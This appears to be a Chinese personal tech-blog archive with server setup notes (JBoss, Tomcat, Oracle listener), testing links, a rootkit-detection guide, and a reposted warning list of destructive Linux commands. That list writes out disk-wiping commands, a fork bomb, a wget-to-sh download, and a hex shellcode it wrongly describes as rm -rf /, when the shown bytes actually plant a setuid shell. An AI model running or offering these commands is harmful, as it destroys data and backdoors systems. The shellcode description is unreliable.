-
Linux下安装jboss
2010-06-09 12:40:51
环境:Linux AS5 Update3
JBOSS:http://www.jboss.org/jbossas/downloads/
下载 jboss-5.1.0.GA-jdk6.zip
JDK:http://java.sun.com/javase/downloads/index.jsp
下载:jdk-6u17-linux-i586.bin软件都放到/usr/local/目录下
1.首先安装jdk,直接运行
#./ jdk-6u17-linux-i586.bin即可
2.然后安装JBOSS,直接解压即可
#unzip jboss-5.1.0.GA-jdk6.zip
3.修改环境变量
打开/usr/local/jboss-4.2.3.GA/bin/run.sh
在### $Id: run.sh 75849 2008-07-15 18:43:17Z dimitris@jboss.org $ ###下一行添加
export JAVA_HOME=/usr/java/jdk1.6.0_11
export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar
export PATH=$PATH:$JAVA_HOME/bin
export LANG=zh_CN.GB18030
ulimit -n 1024000
其中JAVA_HOME后面写上jdk的路径
4.修改默认的8080端口
打开/usr/local/jboss-5.1.0.GA/server/default/deploy/jbossweb.sar/server.xml,(有的地方是/usr/local/jboss-4.2.3.GA/server/default/deploy/jboss-web.deployer/server.xml)把8080改成80
5.启动jboss./run.sh
#nohup sh /usr/local/jboss-4.2.3.GA/bin/run.sh –b 0.0.0.0 &---------------------------------------------------------------------------------------------------------------------------
安装JDK方法二
---------------------------------------------------------------------------------------------------------------------------root权限为前提
(通过su 获取权限)
-----------------
将jdk-1_5_0_07-linux-i586-rpm-1.bin 拷贝到根目录下的/opt下。
运行终端。切换到opt目录下。
运行:./jdk-1_5_0_07-linux-i586-rpm-1.bin
要求输入是否同意条款。输入 yes
ok,完毕。
jdk的配置
----------------
在终端中输入su ,再输入密码,临时取得root身份。(有修改profile权限)
vi /etc/profile
按' i ' 在最后一行,
#
# End of /etc/profile
#
前插入:
JAVA_HOME=/usr/java/jdk1.5.0_07
JRE_HOME=/usr/java/jdk1.5.0_07/jre
PATH=$JAVA_HOME/bin:JRE_HOME/bin:$PATH
CLASSPATH=.:$JAVA_HOME/lib/jt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib
export JAVA_HOME JRE_HOME PATH CLASSPATH
按esc,然后:wq保存退出.
使环境变量生效:
#source /etc/profile
查看: #echo $JAVA_HOME (会显示JDK所在目录)
#java -version (查看JDK版本信息) -
linux tomcat ( 转)
2010-06-07 09:19:21
一,安装前的准备:
1,Linux版本:[root@tpwb /]# uname -r
2.6.9-34.EL(版本内核)
2,tomcat版本:jakarta-tomcat-5.0.28.tar(大小:10.2M)
你可以去http://jakarta.apache.org/tomcat 下载
二,tomcat的安装
安装前推荐一个网址,上面也有关于tocat安装的信息,可以作为参考。http://dev.csdn.net/article/46/46943.shtm
3,下面开始安装。
[root@tpwb ~]# cd /usr/local
[root@tpwb local]# ls
bin games lib lost+found sbin src
etc include jakarta-tomcat-5.0.28.tar.gz libexec man share
我把j2sdk-1_4_2_04-linux-i586-rpm.bin放在local目录下,你也可以放在其他地方。
第一部:
首先解压缩。
[root@tpwb local]# tar -zxvf jakarta-tomcat-5.0.28.tar.gz
[root@tpwb local]# ls
bin games jakarta-tomcat-5.0.28 lib lost+found sbin src
etc include jakarta-tomcat-5.0.28.tar.gz libexec man share
第二部:
设置环境变量
我想到这的话,可能有人会问,为什么要设置环境变量。
提供一个网址,上面说的比较详细:
总体来说就在运行tomact命令是能找到tomcat 的目录,知道它安装到哪了。
下面设置一个两个环境变量CATALINA_HOME和CATALINA_BASE,
编辑~/.bashrc文件。加入
export CATALINA_BASE=/usr/local/jakarta-tomcat-5.0.28
export CATALINA_HOME=/usr/local/jakarta-tomcat-5.0.28
[root@tpwb local]# cd ~
[root@tpwb ~]# ls -a
. .bash_history .bashrc .gconfd install.log.syslog
.. .bash_logout .cshrc .gtkrc .tcshrc
anaconda-ks.cfg .bash_profile .gconf install.log .viminfo
[root@tpwb ~]# vi .bashrc
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
export JAVA_HOME=/usr/java/j2sdk1.4.2_04
export CLASSPATH=$CLASSPATH:$JAVA_HOME/lib:$JAVA_HOME/jre/lib
export PATH=$JAVA_HOME/bin:$JAVA_HOME/jre/bin:$PATH:$HOMR/bin
export CATALINA_BASE=/usr/local/jakarta-tomcat-5.0.28
export CATALINA_HOME=/usr/local/jakarta-tomcat-5.0.28
vi命令用于编辑文本。wq保存退出. 想了解更详细的命令,可以查看上面推荐网址
如果想设置其他用户的环境变量,方法是一样的。在这里不在说了,我在“linux下安装JDK”文章里已经说的很详细了。
下面来验证一下变量设置是否生效
设置完环境变量最好重起一下,不然看不到效果。
[root@tpwb tp]# reboot
Broadcast message from root (pts/0) (Fri Jan 19 16:51:26 2007):
The system is going down for reboot NOW!
我们来查看一下
[root@tpwb ~]# echo $CATALINA_HOME
/usr/local/jakarta-tomcat-5.0.28
[root@tpwb ~]# echo $CATALINA_BASE
/usr/local/jakarta-tomcat-5.0.28
已经没问题了。
第三部:
我们先看一下linux所开的端口:
[root@tpwb ~]# netstat –l
然后,运行tomcat console
[root@tpwb ~]# cd /usr/local/jakarta-tomcat-5.0.28
[root@tpwb jakarta-tomcat-5.0.28]# ls
bin conf logs RELEASE-NOTES server temp work
common LICENSE NOTICE RUNNING.txt shared webapps
[root@tpwb jakarta-tomcat-5.0.28]# cd bin
[root@tpwb bin]# ls
bootstrap.jar setclasspath.sh
catalina.50.bat shutdown.bat
catalina.50.sh shutdown.sh
catalina.bat shutdown-using-launcher.bat
catalina.sh shutdown-using-launcher.sh
catalina.xml startup.bat
commons-daemon.jar startup.sh
....
我们要注意这个文件
startup.sh
[root@tpwb bin]./startup.sh
Using CATALINA_BASE: /usr/local/jakarta-tomcat-5.0.28
Using CATALINA_HOME: /usr/local/jakarta-tomcat-5.0.28
Using CATALINA_TMPDIR: /usr/local/jakarta-tomcat-5.0.28/temp
Using JAVA_HOME: /usr/java/j2sdk1.4.2_04
我们在来一下linux现在所开的端口:
[root@tpwb ~]# netstat –l
是不是多了个8080端口呢!这个就是Tomcat的默认端口/
好下面开始我们的安装测试了
http://你的IP:8080 是不是看到tomcat的Web页面了。
如果还没看到,那就把放火墙关了。
[root@tpwb ~]# service iptables stop
清除防火墙规则:[ 确定 ]
把 chains 设置为 ACCEPT 策略:filter [ 确定 ]
正在卸载 Iiptables 模块:[ 确定 ]
如果我想让Tomcat开机自动加载怎么办呢?好,往下看吧!
Tomcat安装目录下的bin目录有两个脚本分别用来启动和停止Tomcat,分别是startup.sh, shutdown.sh,你可以用这两个脚本来手工启动和停止Tomcat服务并进行安装后的测试。
我们最简单的方法就是通过startup.sh来自动启动Tomcat,编辑/etc/rc.d/rc.local 增加内容(假设JDK目录是/usr/jdk,Tomcat目录是/apache/tomcat)
export JDK_HOME=/usr/jdk
export JAVA_HOME=/usr/jdk
/apache/tomcat/bin/startup.sh
[root@tpwb ~]# vi /etc/rc.d/rc.local
#!/bin/sh
#
# This script. will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style. init stuff.
touch /var/lock/subsys/local
export JDK_HOME=/usr/java/j2sdk1.4.2_04
export JAVA_HOME=/usr/java/j2sdk1.4.2_04
/usr/local/jakarta-tomcat-5.0.28/bin/startup.sh
这个是我的目录的
这样在系统重启后就可以自动启动Tomcat
第四部:
如果希望以http://www.xxx.com:8080/myweb 访问自己的jsp程序,以下步骤:
(1).在任意地方建立目录myweb 比如 /home/bqlr/myweb
(2).在myweb下建立 WEB-INF 和WEB-INF/classes目录
(3).在tomcat的conf目录下修改server.xml:<!-- Tomcat Manager Context -->
<Context path="/manager" docBase="manager" debug="0" privileged="true"/><!--下面是自己加入的-->
<Context path="/myweb" docBase="/home/bqlr/myweb" debug="0" reloadable="true"/>
(4) 在tomcat的webapps目录下,建立目录连接myweb
ln -s /home/bqlr/myweb /usr/local/tomcat/webapps/myweb(5) 重新启动Tomcat. class文件放在/home/bqlr/myweb/WEB-INF/classes目录下 jsp文件放在/home/bqlr/myweb下
(6) Mysql的安装很简单,到www.mysql.com下载最新版,推荐RPM包.直接RPM -i几个安装包就可以.
tomcat与apache的进一步整合附录:
bin文件的打开:chmod +x j2sdk-1_4_2-nb-3_5_1-bin-linux.bin
./j2sdk-1_4_2-nb-3_5_1-bin-linux.bin -
测试同行的 blog
2010-01-14 10:00:49
http://hi.baidu.com/dearhwj/blog -
wr测性能
2010-01-14 09:50:52
http://www.cnitblog.com/tjitty/archive/2007/01/24/22261.html -
转载 在Linux下Oracle LSNRCTL--监听器的启动和关闭
2010-01-14 09:47:57
对于DBA来说,启动和关闭oracle监听器是很基础的任务,但是Linux系统管理员或者程序员有时也需要在开发数据库中做一些基本的DBA操作,因此了解一些基本的管理操作对他们来说很重要。
本文将讨论用LSNRCTL命令启动、关闭和查看监听器的状态的方法。
怎样启动、关闭和重新启动oracle监听器
在启动、关闭或者重启oracle监听器之前确保使用lsnrctl status命令检查oracle监听器的状态。除了得到监听器的状态之外,你还可以从lsnrctl status命令的输出中得到如下的信息:
监听器的启动时间
监听器的运行时间
监听器参数文件listener.ora的位置,通常位于$ORACLE_HOME/network/admin目录下
监听器日志文件的位置
如果oracle监听器没用运行,你将得到如下的信息
view plaincopy to clipboardprint?
$ lsnrctl status
LSNRCTL for Linux: Version 11.1.0.6.0 - Production on 04-APR-2009 16:27:39
Copyright (c) 1991, 2007, Oracle. All rights reserved.
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.2)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Linux Error: 111: Connection refused
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Linux Error: 2: No such file or directory
$ lsnrctl status
LSNRCTL for Linux: Version 11.1.0.6.0 - Production on 04-APR-2009 16:27:39
Copyright (c) 1991, 2007, Oracle. All rights reserved.
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.2)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Linux Error: 111: Connection refused
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Linux Error: 2: No such file or directory
如果oracle监听器正在运行,你将得到如下信息
view plaincopy to clipboardprint?
$ lsnrctl status
LSNRCTL for Linux: Version 11.1.0.6.0 - Production on 04-APR-2009 16:27:02
Copyright (c) 1991, 2007, Oracle. All rights reserved.
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.2)(PORT=1521)))
STATUS of the LISTENER
————————
Alias LISTENER
Version TNSLSNR for Linux: Version 11.1.0.6.0 - Production
Start Date 29-APR-2009 18:43:13
Uptime 6 days 21 hr. 43 min. 49 sec
Trace Level off
Security ON: Local OS Authentication
SNMP OFF
Listener Parameter File /u01/app/oracle/product/11.1.0/network/admin/listener.ora
Listener Log File /u01/app/oracle/diag/tnslsnr/devdb/listener/alert/log.xml
Listening Endpoints Summary…
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.2)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
Services Summary…
Service “devdb” has 1 instance(s).
Instance “devdb”, status UNKNOWN, has 1 handler(s) for this service…
Service “devdb.thegeekstuff.com” has 1 instance(s).
Instance “devdb”, status READY, has 1 handler(s) for this service…
Service “devdbXDB.thegeekstuff.com” has 1 instance(s).
Instance “devdb”, status READY, has 1 handler(s) for this service…
Service “devdb_XPT.thegeekstuff.com” has 1 instance(s).
Instance “devdb”, status READY, has 1 handler(s) for this service…
The command completed successfully
$ lsnrctl status
LSNRCTL for Linux: Version 11.1.0.6.0 - Production on 04-APR-2009 16:27:02
Copyright (c) 1991, 2007, Oracle. All rights reserved.
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.2)(PORT=1521)))
STATUS of the LISTENER
————————
Alias LISTENER
Version TNSLSNR for Linux: Version 11.1.0.6.0 - Production
Start Date 29-APR-2009 18:43:13
Uptime 6 days 21 hr. 43 min. 49 sec
Trace Level off
Security ON: Local OS Authentication
SNMP OFF
Listener Parameter File /u01/app/oracle/product/11.1.0/network/admin/listener.ora
Listener Log File /u01/app/oracle/diag/tnslsnr/devdb/listener/alert/log.xml
Listening Endpoints Summary…
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.2)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
Services Summary…
Service “devdb” has 1 instance(s).
Instance “devdb”, status UNKNOWN, has 1 handler(s) for this service…
Service “devdb.thegeekstuff.com” has 1 instance(s).
Instance “devdb”, status READY, has 1 handler(s) for this service…
Service “devdbXDB.thegeekstuff.com” has 1 instance(s).
Instance “devdb”, status READY, has 1 handler(s) for this service…
Service “devdb_XPT.thegeekstuff.com” has 1 instance(s).
Instance “devdb”, status READY, has 1 handler(s) for this service…
The command completed successfully
2.启动oracle监听器
如果oracle监听器没用运行,你可以用lsnrctl start命令启动oracle监听器,该命令将启动所有的监听器,如果你只想启动特定的监听器,可以再start后面指定监听器的名字,例如:lsnrctl start [listener-name]。
view plaincopy to clipboardprint?
$ lsnrctl start
LSNRCTL for Linux: Version 11.1.0.6.0 - Production on 04-APR-2009 16:27:42
Copyright (c) 1991, 2007, Oracle. All rights reserved.
Starting /u01/app/oracle/product/11.1.0/bin/tnslsnr: please wait…
TNSLSNR for Linux: Version 11.1.0.6.0 - Production
System parameter file is /u01/app/oracle/product/11.1.0/network/admin/listener.ora
Log messages written to /u01/app/oracle/diag/tnslsnr/devdb/listener/alert/log.xml
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.2)(PORT=1521)))
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.2)(PORT=1521)))
STATUS of the LISTENER
————————
Alias LISTENER
Version TNSLSNR for Linux: Version 11.1.0.6.0 - Production
Start Date 04-APR-2009 16:27:42
Uptime 0 days 0 hr. 0 min. 0 sec
Trace Level off
Security ON: Local OS Authentication
SNMP OFF
Listener Parameter File /u01/app/oracle/product/11.1.0/network/admin/listener.ora
Listener Log File /u01/app/oracle/diag/tnslsnr/devdb/listener/alert/log.xml
Listening Endpoints Summary…
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.2)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
Services Summary…
Service “devdb” has 1 instance(s).
Instance “devdb”, status UNKNOWN, has 1 handler(s) for this service…
The command completed successfully
$ lsnrctl start
LSNRCTL for Linux: Version 11.1.0.6.0 - Production on 04-APR-2009 16:27:42
Copyright (c) 1991, 2007, Oracle. All rights reserved.
Starting /u01/app/oracle/product/11.1.0/bin/tnslsnr: please wait…
TNSLSNR for Linux: Version 11.1.0.6.0 - Production
System parameter file is /u01/app/oracle/product/11.1.0/network/admin/listener.ora
Log messages written to /u01/app/oracle/diag/tnslsnr/devdb/listener/alert/log.xml
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.2)(PORT=1521)))
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.2)(PORT=1521)))
STATUS of the LISTENER
————————
Alias LISTENER
Version TNSLSNR for Linux: Version 11.1.0.6.0 - Production
Start Date 04-APR-2009 16:27:42
Uptime 0 days 0 hr. 0 min. 0 sec
Trace Level off
Security ON: Local OS Authentication
SNMP OFF
Listener Parameter File /u01/app/oracle/product/11.1.0/network/admin/listener.ora
Listener Log File /u01/app/oracle/diag/tnslsnr/devdb/listener/alert/log.xml
Listening Endpoints Summary…
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.2)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
Services Summary…
Service “devdb” has 1 instance(s).
Instance “devdb”, status UNKNOWN, has 1 handler(s) for this service…
The command completed successfully
3.关闭oracle监听器
如果oracle监听器正在运行,可以使用lsnrctl stop命令关闭oracle监听器,该命令将关闭所有的监听器,如果你只想关闭特定的监听器,可以再stop后面指定监听器的名字,例如:lsnrctl stop [listener-name]
view plaincopy to clipboardprint?
$ lsnrctl stop
LSNRCTL for Linux: Version 11.1.0.6.0 - Production on 04-APR-2009 16:27:37
Copyright (c) 1991, 2007, Oracle. All rights reserved.
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.2)(PORT=1521)))
The command completed successfully
$ lsnrctl stop
LSNRCTL for Linux: Version 11.1.0.6.0 - Production on 04-APR-2009 16:27:37
Copyright (c) 1991, 2007, Oracle. All rights reserved.
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.2)(PORT=1521)))
The command completed successfully
4.重启oracle监听器
用lsnrctl reload重启监听器,此命令可以代替lsnrctl stop和lsnrctl start。重启将会在不需要关闭和启动监听器的情况下读取listener.ora的配置。
view plaincopy to clipboardprint?
$ lsnrctl reload
LSNRCTL for Linux: Version 11.1.0.6.0 - Production on 04-APR-2009 17:03:31
Copyright (c) 1991, 2007, Oracle. All rights reserved.
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.2)(PORT=1521)))
The command completed successfully
$ lsnrctl reload
LSNRCTL for Linux: Version 11.1.0.6.0 - Production on 04-APR-2009 17:03:31
Copyright (c) 1991, 2007, Oracle. All rights reserved.
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.2)(PORT=1521)))
The command completed successfully
Oracle监听器帮助
1.查看所有的监听器命令
lsnrctl hep命令可以显示所有可用的监听器命令。在oracle11g中其输出如下:
start - Start the Oracle listener
stop - Stop the Oracle listener
status - Display the current status of the Oracle listener
services - Retrieve the listener services information
version - Display the oracle listener version information
reload - This will reload the oracle listener SID and parameter files. This is equivalent to lsnrctl stop and lsnrctl start.
save_config - This will save the current settings to the listener.ora file and also take a backup of the listener.ora file before overwriting it. If there are no changes, it will display the message “No changes to save for LISTENER”
trace - Enable the tracing at the listener level. The available options are ‘trace OFF’, ‘trace USER’, ‘trace ADMIN’ or ‘trace SUPPORT’
spawn - Spawns a new with the program with the spawn_alias mentioned in the listener.ora file
change_password - Set the new password to the oracle listener (or) change the existing listener password.
show - Display log files and other relevant listener information.
view plaincopy to clipboardprint?
$ lsnrctl help
LSNRCTL for Linux: Version 11.1.0.6.0 - Production on 04-APR-2009 16:12:09
Copyright (c) 1991, 2007, Oracle. All rights reserved.
The following operations are available
An asterisk (*) denotes a modifier or extended command:
start stop status
services version reload
save_config trace spawn
change_password quit exit
set* show*
$ lsnrctl help
LSNRCTL for Linux: Version 11.1.0.6.0 - Production on 04-APR-2009 16:12:09
Copyright (c) 1991, 2007, Oracle. All rights reserved.
The following operations are available
An asterisk (*) denotes a modifier or extended command:
start stop status
services version reload
save_config trace spawn
change_password quit exit
set* show*
2.得到指定监听器命令的详细帮助信息
可以使用lsnrctl help得到指定的命令的详细帮助信息。如下所示
view plaincopy to clipboardprint?
$ lsnrctl help show
LSNRCTL for Linux: Version 11.1.0.6.0 - Production on 04-APR-2009 16:22:28
Copyright (c) 1991, 2007, Oracle. All rights reserved.
The following operations are available after show
An asterisk (*) denotes a modifier or extended command:
rawmode displaymode
rules trc_file
trc_directory trc_level
log_file log_directory
log_status current_listener
inbound_connect_timeout startup_waittime
snmp_visible save_config_on_stop
dynamic_registration
-
七个极具杀伤性的Linux系统命令
2008-12-05 09:44:23
七个极具杀伤性的Linux系统命令
发布时间: 2008-11-26 14:26 作者: 未知 来源: 网络转载
字体: 小 中 大 | 上一篇 下一篇 | 打印 | 我要投稿 | 每周一问,答贴有奖
如果您使用Linux,可千万要记得不要让傻孩子们敲入以下命令,尽管这些命令看上去相当复杂,但还是会对你的系统造成严重影响。
有一些会影响你的程序和系统运行,有一些会直接把你的盘抹掉,这些命令几乎没有什么可以挽回的余地。
1.Code: rm-rf/
这个很简单,根目录会被擦光。
2.Code:
charesp[]__attribute__((section(".text")))/*e.s.p
release*/
="\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp-p/bin/sh/tmp/.beyond;chmod4755
/tmp/.beyond;";
没看懂?呵呵,其实就是16进制的[rm-rf/]。
3.Code: mkfs.ext3/dev/sda
抹盘行为无疑是危险的。
4.Code: :(){:|:&};:
这不是90后的表情,也不是托蒂射点球前的表情,它可以让你的系统迅速因为处理大量数据而死机。
5.Code: any_command>/dev/sda
这个命令将会写入大量的RAW数据,可以导致数据丢失。
6.Code: wgethttp://some_untrusted_source-O-|sh
和Windows一样,千万不要乱下载未经证实安全性的源,这年头Linux和胡萝卜一样,也不会保险。
7.Code: mv/home/yourhomedirectory/*/dev/null
这条命令无疑会让系统抓狂,你的主目录会再也看不到。
-
判断Linux系统是否被黑的方法
2008-12-05 09:41:56
判断Linux系统是否被黑的方法
发布时间: 2008-12-04 13:55 作者: 未知 来源: 网络转载
字体: 小 中 大 | 上一篇 下一篇 | 打印 | 我要投稿 | 每周一问,答贴有奖
俗称“脚本小鬼”的家伙是属于那种很糟糕的黑客,因为基本上他们中的许多和大多数人都是如此的没有技巧。可以这样说,如果你安装了所有正确的补丁,拥有经过测试的防火墙,并且在多个级别都激活了先进的入侵检测系统,那么只有在一种情况下你才会被黑,那就是,你太懒了以至没去做该做的事情,例如,安装BIND的最新补丁。
一不留神而被黑确实让人感到为难,更严重的是某些脚本小鬼还会下载一些众所周知的“root kits”或者流行的刺探工具,这些都占用了你的CPU,存储器,数据和带宽。这些坏人是从那里开始着手的呢?这就要从root kit开始说起。
一个root kit其实就是一个软件包,黑客利用它来提供给自己对你的机器具有root级别的访问权限。一旦这个黑客能够以root的身份访问你的机器,一切都完了。唯一可以做就是用最快的效率备份你的数据,清理硬盘,然后重新安装操作系统。无论如何,一旦你的机器被某人接管了要想恢复并不是一件轻而易举的事情。
你能信任你的ps命令吗?
找出root kit的首个窍门是运行ps命令。有可能对你来说一切都看来很正常。图示是一个ps命令输出的例子。真正的问题是,“真的一切都正常吗?”黑客常用的一个诡计就是把ps命令替换掉,而这个替换上的ps将不会显示那些正在你的机器上运行的非法程序。为了测试个,应该检查你的ps文件的大小,它通常位于 /bin/ps。在我们的Linux机器里它大概有60kB。我最近遇到一个被root kit替换的ps程序,这个东西只有大约12kB的大小。
另一个明显的骗局是把root的命令历史记录文件链接到/dev/null。这个命令历史记录文件是用来跟踪和记录一个用户在登录上一台Linux机器后所用过的命令的。黑客们把你的历史纪录文件重定向到/dev/null的目的在于使你不能看到他们曾经输入过的命令。
你可以通过在shell提示符下敲入history来访问你的历史记录文件。假如你发现自己 正在使用history命令,而它并没有出现在之前使用过的命令列表里,你要看一看你的~/.bash_history 文件。假如这个文件是空的,就执行一个ls -l ~/.bash_history命令。在你执行了上述的命令后你将看到类似以下的输出:
-rw------- 1 jd jd 13829 Oct 10 17:06 /home/jd/.bash_history
又或者,你可能会看到类似以下的输出:
lrwxrwxrwx 1 jd jd 9 Oct 10 19:40 /home/jd/.bash_history -> /dev/null
假如你看到的是第二种,就表明这个 .bash_history 文件已经被重定向到/dev/null。这是一个致命的信息,现在就立即把你的机器从Internet上断掉,尽可能备份你的数据,并且开始重新安装系统。
寻找未知的用户账号
在你打算对你的Linux机器做一次检测的时候,首先检查是否有未知的用户账号无疑是明智的。在下一次你登录到你的Linux机器时,敲入以下的命令:
grep :x:0: /etc/passwd
只有一行,我再强调一遍,在一个标准的Linux安装里,grep命令应该只返回一行,类似以下:
root:x:0:0:root:/root:/bin/bash
假如在敲入之前的grep命令后你的系统返回的结果不止一行,那可能就有问题了。应该只有一个用户的UID为0,而如果grep命令的返回结果超过一行,那就表示不止一个用户。
认真来说,虽然对于发现黑客行为,以上都是一些很好的基本方法。但这些技巧本身并不能构成足够的安全性,而且其深度和广度和在文章头提到的入侵检测系统比起来也差得远。
我的建议是,假如你怀疑你的系统真的出了问题,打电话给一个Linux的安全专家,参考他的意见。毕竟Linux的安全不是一下子就可以弄好的。
-
测试网站和电子书下载网址 2008-10-20 11:11:35 / 个人分类:个人日记
2008-11-14 09:36:17
英文测试网站:
http://www.softwareqatest.com/
http://www.testingcraft.com/
http://www.qacity.com/
51Testing测试网---www.51testing.com
测试时代----------www.testage.net 焦点测试----------www.testfocus.com.cn
3Atesting----------www.3atesting.com
CSDN测试频道------testing.csdn.net
希赛网测试频道----testing.csai.cn
中国软件测试联盟--www.iceshi.com
一起测试网--------www.17testing.com
北大测试----------www.btesting.com
中国软件测试基地--www.cntesting.com
中国软件评测中心--www.cstc.org.cn
中国软件质量网----www.rjzl.gov.cn
软件工程专家网----www.51cmm.com
中国软件测试在线--www.softtest.cn
天天软件测试网----www.tttest.com/
365testing--------www.365testing.com
中国测试员--------www.cntester.com
http://www.sawin.cn/SawinPilot/saSubTech.asp?SubClass=Test
http://www.io.com/~wazmo/qa/
http://www.mtsu.edu/~storm/
http://www.qaforums.com
http://www.faqs.org/faqs/software-eng/testing-faq/
电子书下载网址
http://www.itpub.net/325522,1.html
测试书籍的推荐:
http://www.cntesting.com/hphtml/?thread-7346.html
软件测试好书下载和推荐:
http://www.51testing.com/recommend.htm
书库
http://book.httpcn.com/
http://www.manyi100.com/
http://www.netyi.net/
-
]系统瓶颈分析举例
2008-10-28 18:04:09
2008-10-22 11:02:28 / 个人分类:测试精华
经验举例1
交易的响应时间如果很长,远远超过系统性能需求,表示耗费CPU的数据库操作,例如排序,执行aggregate functions(例如sum、min、max、count)等较多,可考虑是否有索引以及索引建立的是否合理;尽量使用简单的表联接;水平分割大表格等方法来降低该值。
经验举例2
分段排除错误。测试工具可以模拟不同的虚拟用户来单独访问Web服务器、应用服务器和数据库服务器,这样,就可以在Web端测出的响应时间减去以上各个分段测出的时间就可以知道瓶颈在哪并着手调优。
经验举例3
UNIX资源监控(NT操作系统同理)中指标内存页交换速率(Paging rate),如果该值偶尔走高,表明当时有线程竞争内存。如果持续很高,则内存可能是瓶颈。也可能是内存访问命中率低。“Swap in rate”和“Swap out rate”也有类似的解释。
经验举例4
UNIX资源监控(NT操作系统同理)中指标CPU占用率(CPU utilization),如果该值持续超过95%,表明瓶颈是CPU。可以考虑增加一个处理器或换一个更快的处理器 。合理使用的范围在60%至70%。
经验举例5
UNIX资源监控(NT操作系统同理)中指标磁盘交换率(Disk rate),如果该参数值一直很高,表明I/O有问题。可考虑更换更快的硬盘系统、重新部署业务逻辑等,另外设置Tempdb in RAM,减低"max async IO","max lazy writer IO"等措施都会降低该值。
经验举例6
Tuxedo资源监控中指标队列中的字节数(Bytes on queue),队列长度应不超过磁盘数的1.5~2倍。要提高性能,可增加磁盘。注意:一个Raid Disk实际有多个磁盘。
经验举例7
SQLServer资源监控中指标缓存点击率(Cache Hit Ratio),该值越高越好。如果持续低于80%,应考虑增加内存。注意该参数值是从SQL Server启动后,就一直累加记数,所以运行经过一段时间后,该值将不能反映系统当前值。
-
download address
2008-09-23 15:19:56
-
silktest
2008-09-23 15:18:41
silktest -
模板
2008-09-22 10:46:58
标题搜索
我的存档
数据统计
- 访问量: 5091
- 日志数: 12
- 文件数: 1
- 建立时间: 2008-03-06
- 更新时间: 2018-07-20